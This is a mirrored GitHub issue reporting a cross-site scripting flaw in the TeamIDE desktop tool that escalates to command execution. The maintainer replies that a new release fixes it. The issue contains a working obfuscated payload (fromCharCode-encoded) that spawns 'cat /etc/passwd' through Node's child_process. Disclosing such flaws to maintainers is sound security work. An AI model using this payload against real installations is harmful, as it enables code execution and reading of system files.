starred/teamide-team-ide

Fork 0

mirror of https://github.com/team-ide/teamide.git synced 2026-04-27 19:45:49 +03:00

[GH-ISSUE #118] 【漏洞】XSS导致RCE #23

New issue

Closed

opened 2026-02-28 00:38:23 +03:00 by kerem · 4 comments

kerem commented

2026-02-28 00:38:23 +03:00

Owner

Originally created by @Asura88 on GitHub (Jul 26, 2023).
Original GitHub issue: https://github.com/team-ide/teamide/issues/118

【漏洞】XSS导致RCE

Originally created by @Asura88 on GitHub (Jul 26, 2023). Original GitHub issue: https://github.com/team-ide/teamide/issues/118 【漏洞】XSS导致RCE <img src=x onerror=alert(1)> ![image](https://github.com/team-ide/teamide/assets/25000885/74c856de-62bd-49ab-b84b-1548f01b0d8a) ![image](https://github.com/team-ide/teamide/assets/25000885/9f620cfe-11ca-478f-ada5-9e17117ddc61)

kerem closed this issue

2026-02-28 00:38:23 +03:00

kerem commented

2026-02-28 00:38:24 +03:00

Author

Owner

@Asura88 commented on GitHub (Jul 26, 2023):

@Asura88 commented on GitHub (Jul 26, 2023): `<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))>`

kerem commented

2026-02-28 00:38:24 +03:00

Author

Owner

@Asura88 commented on GitHub (Jul 26, 2023):

<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))>

@Asura88 commented on GitHub (Jul 26, 2023): ``` <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))> ```

kerem commented

2026-02-28 00:38:24 +03:00

Author

Owner

@Asura88 commented on GitHub (Jul 26, 2023):

由于测试导致拒绝服务了，打开的窗口由于名称过长无法关闭，能否优化？比如增加一键关闭所有

@Asura88 commented on GitHub (Jul 26, 2023): 由于测试导致拒绝服务了，打开的窗口由于名称过长无法关闭，能否优化？比如增加一键关闭所有 ![image](https://github.com/team-ide/teamide/assets/25000885/3d224db9-3161-41de-b76c-1125b405c3eb)

kerem commented

2026-02-28 00:38:24 +03:00

Author

Owner

@team-ide commented on GitHub (Aug 10, 2023):

右击菜单允许填充 html 标签导致这个问题，可以下载最新版本看下；右击标签可以关闭所有

@team-ide commented on GitHub (Aug 10, 2023): 右击菜单允许填充 html 标签导致这个问题，可以下载最新版本看下；右击标签可以关闭所有

kerem referenced this issue

2026-02-28 00:38:51 +03:00

[PR #23] [MERGED] Update release.yml #136

No labels

pull-request

No milestone

No project

No assignees

1 participant

Notifications

Due date

The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference

starred/teamide-team-ide#23

No description provided.

Rows
Columns